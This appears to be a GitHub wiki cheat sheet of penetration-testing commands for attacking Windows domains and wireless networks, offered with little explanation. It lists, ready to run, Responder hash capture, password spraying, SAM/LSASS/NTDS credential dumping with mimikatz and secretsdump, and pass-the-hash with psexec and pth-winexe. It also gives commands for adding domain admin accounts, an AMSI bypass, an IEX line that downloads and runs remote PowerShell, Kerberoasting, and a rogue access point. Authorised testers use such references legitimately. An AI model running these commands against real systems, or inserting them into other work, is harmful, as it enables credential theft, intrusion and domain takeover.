-
Notifications
You must be signed in to change notification settings - Fork 0
Home
Welcome to the Pentest-Commands-and-dirty-scripts- wiki!
nmap -sL -R --dns-servers 8.8.8.8 -iL hostnames.txt -vv -oA output
./EyeWitness.py -f /root/blah.nessus --web -d COMPANY --timeout 20 --no-prompt --prepend-https --no-dns
Grab NTLM hashes off the network
Without wpad:
responder -I eth0
With wpad:
responder -I eth0 --wpad -b -f -F
Filter logs from logs folder and remove machine accounts:
sort -m *.txt | uniq -d | awk '!/\$/'
Cracking with John:
john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt
Use hashcat on a more powerful box. This is only for easy wins.
samdump2 SYSTEM SAM > hashes.txt
theharvester -d blah.com -l 1000 -b linkedin
awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'
Handy if you have generated a list from linkedin or a list of usernames.
nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"
username list is located at /usr/local/share/nmap/nselib/data/usernames.lst
in Kali
Still works on infra that was upgraded.
net use \\IP_ADDRESS\ipc$ "" /user:""
hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
nmap -script smb-security-mode -p445 -iL 445-open.txt -v10 -T4 -oA smb-signing
awk -F "signing: disabled" '/^Nmap/ {a=$0} /signing: disabled/ {print a}' smb-signing.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > smb-disabled.txt
When you have an initial set of compromised creds run these from a Virtual Machine.
C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser “cmd.exe”
check dc: nltest /dsgetdc:domain.local
To change DC via registry to point at domain being tested:
HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Netlogon Parameters “SiteName“ > DC1.domain.com
Create session for use with dumpsec
net use \\10.0.0.1\ipc$ /user:domain.local\username password
net users /domain
net group /domain "Domain Admins"
net accounts /domain
Note that the above commands do not work with runas. Below PowerView functions will work with runas.
. .\PowerView.ps1
Get-UserProperty -Properties samaccountname
Get-NetGroupMember
Get-DomainPolicy
Search shares and files using Invoke-FileFinder and Invoke-ShareFinder
Run locally on non-domain joined machine (remember to add target domain to registry):
..\BloodHound.ps1
Invoke-BloodHound
Useful when you have a remote shell.
powershell Set-ExecutionPolicy RemoteSigned
powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"
Use this when you cannot copy BloodHound.ps1 over to target.
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd
Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.
psexec.py user@IP
psexec.py user@IP -hashes ntlm:hash
wmiexec.py user@IP
wmiexec.py user@IP -hashes ntlm:hash
python smbclient.py domain/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:blah
samdump2 SYSTEM SAM > hashes.txt
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
pwdump system sam
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
To find where NTDS is run the below:
reg.exe query hklm\system\currentcontrolset\services\ntds\parameters
C:\vssadmin list shadows
C:\vssadmin create shadow /for=C:
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
secretsdump.py -system system.save -ntds ntds.dit LOCAL
-just-dc-ntlm
vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}
ntdsutil
ntdsutil: snapshot
ntdsutil: list all
ntdsutil: create
snapshot: mount 1
Cleanup snapshots:
snapshot: list all
snapshot: unmount 1
snapshot: list all
snapshot: delete 1
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
net user username password /ADD
net localgroup Administrators username /ADD
#!/bin/sh
for ip in $(cat ip.txt);do
pth-winexe -U Admin%hash //$ip "ipconfig"
pth-winexe -U Admin%hash //$ip "tasklist /v"
done
This is the best script:
https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
Invoke-AutoKerberoast
sudo apt-get install nvidia-367
sudo nvidia-smi
reboot
sudo hashcat -I
hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst
https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
lsusb
/etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
apt-get update
apt-get dist-upgrade
reboot
apt-get install realtek-rt188xxau-dkms
modprobe 8812au
modinfo 8812au
iwconfig
airodump-ng wlan0
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
apt-get install libssl-dev libnl-genl-3-dev
wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz
tar -xvf hostapd-2.6.tar.gz
cd hostapd-2.6/
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
cd hostapd/
apt-get install pkg-config
apt-get install libssl1.0-dev
make
cd ../../hostapd-wpe/
cd certs/
./bootstrap
./hostapd-wpe hostapd-wpe.conf
airmon-ng check kill
service network-manager start
rfkill list all
rfkill unblock all
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Change channels Set channel 6, width 40 MHz: $ sudo iw wlan0 set channel 6 HT40- Set channel 149, width 80 MHz: $ sudo iw wlan0 set freq 5745 80 5775 Power $ sudo iwconfig wlan0 txpower 30 or $ sudo iw wlan0 set txpower fixed 3000
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
sysctl net.ipv4.ip_forward=1
ifconfig eth1 promisc
ifconfig eth2 promisc
Important: Make sure to connect host to eth1 first,then eth2 to switch.
FENRIR > create_virtual_tap
FENRIR > set hostIface eth1 hostIface ===> eth1
FENRIR > set host_ip 192.168.31.135 host_ip ===> 192.168.31.135
FENRIR > set host_mac 509a4c505cda host_mac ===> 509a4c505cda
FENRIR > set netIface eth2 netIface ===> eth2
FENRIR > add_reverse_rule 137 multi IP New rule added : port = 137 type = multi proto = IP
FENRIR > add_reverse_rule 5355 multi IP New rule added : port = 5355 type = multi proto = IP
FENRIR > add_reverse_rule 445 unique IP New rule added : port = 445 type = unique proto = IP
FENRIR > run_debug
route add default gw 10.0.0.42
##MS17-010 Nmap Scan
nmap -Pn -p445 - open - max-hostgroup 3 - smb-vuln-ms17-010 script <ip_netblock>